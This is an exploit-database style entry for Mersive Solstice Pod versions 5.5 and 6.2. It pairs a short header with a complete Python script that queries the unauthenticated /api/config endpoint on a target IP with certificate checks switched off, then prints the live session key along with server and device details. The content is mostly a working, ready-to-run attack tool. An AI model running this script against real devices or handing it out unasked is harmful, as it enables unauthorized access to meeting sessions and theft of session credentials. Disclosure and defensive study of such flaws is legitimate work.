Solstice Pod 6.2 - API Session Key Extraction via API Endpoint

# Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint
# Google Dork: N/A
# Date: 1/17/2025
# Exploit Author: The Baldwin School Ethical Hackers
# Vendor Homepage: https://www.mersive.com/
# Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html
# Versions: 5.5, 6.2
# Tested On: Windows 10, macOS, Linux 
# CVE: N/A
# Description: This exploit takes advantage of an unauthenticated API endpoint (`/api/config`) on the Solstice Pod, which exposes sensitive information such as the session key, server version, product details, and display name. By accessing this endpoint without authentication, attackers can extract live session information.
# Notes: This script extracts the session key, server version, product name, product variant, and display name from the Solstice Pod API. It does not require authentication to interact with the vulnerable `/api/config` endpoint.
# Impact: Unauthorized users can extract session-related information without authentication. The exposed data could potentially lead to further exploitation or unauthorized access.

#!/usr/bin/env python3

import requests
import ssl
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager

# Create an adapter to specify the SSL/TLS version and disable hostname verification
class SSLAdapter(HTTPAdapter):
    def __init__(self, ssl_context=None, **kwargs):
        # Set the default context if none is provided
        if ssl_context is None:
            ssl_context = ssl.create_default_context()
            ssl_context.set_ciphers('TLSv1.2')  # Force TLSv1.2 (or adjust to other versions if needed)
            ssl_context.check_hostname = False  # Disable hostname checking
            ssl_context.verify_mode = ssl.CERT_NONE  # Disable certificate validation
        self.ssl_context = ssl_context
        super().__init__(**kwargs)

    def init_poolmanager(self, *args, **kwargs):
        kwargs['ssl_context'] = self.ssl_context
        return super().init_poolmanager(*args, **kwargs)

# Prompt the user for the IP address
ip_address = input("Please enter the IP address: ")

# Format the URL with the provided IP address
url = f"https://{ip_address}:8443/api/config"

# Create a session and mount the adapter
session = requests.Session()
adapter = SSLAdapter()
session.mount('https://', adapter)

# Send the request to the IP address
response = session.get(url, verify=False)  # verify=False to ignore certificate warnings

if response.status_code == 200:
    # Parse the JSON response
    data = response.json()

    # Extract the sessionKey, serverVersion, productName, productVariant, and displayName values from the response
    session_key = data.get("m_authenticationCuration", {}).get("sessionKey")
    server_version = data.get("m_serverVersion")
    product_name = data.get("m_productName")
    product_variant = data.get("m_productVariant")
    display_name = data.get("m_displayInformation", {}).get("m_displayName")

    # Print the extracted values
    if session_key:
        print(f"Session Key: {session_key}")
    else:
        print("sessionKey not found in the response.")

    if server_version:
        print(f"Server Version: {server_version}")
    else:
        print("serverVersion not found in the response.")

    if product_name:
        print(f"Product Name: {product_name}")
    else:
        print("productName not found in the response.")

    if product_variant:
        print(f"Product Variant: {product_variant}")
    else:
        print("productVariant not found in the response.")

    if display_name:
        print(f"Display Name: {display_name}")
    else:
        print("displayName not found in the response.")
else:
    print(f"Failed to retrieve data. HTTP Status code: {response.status_code}")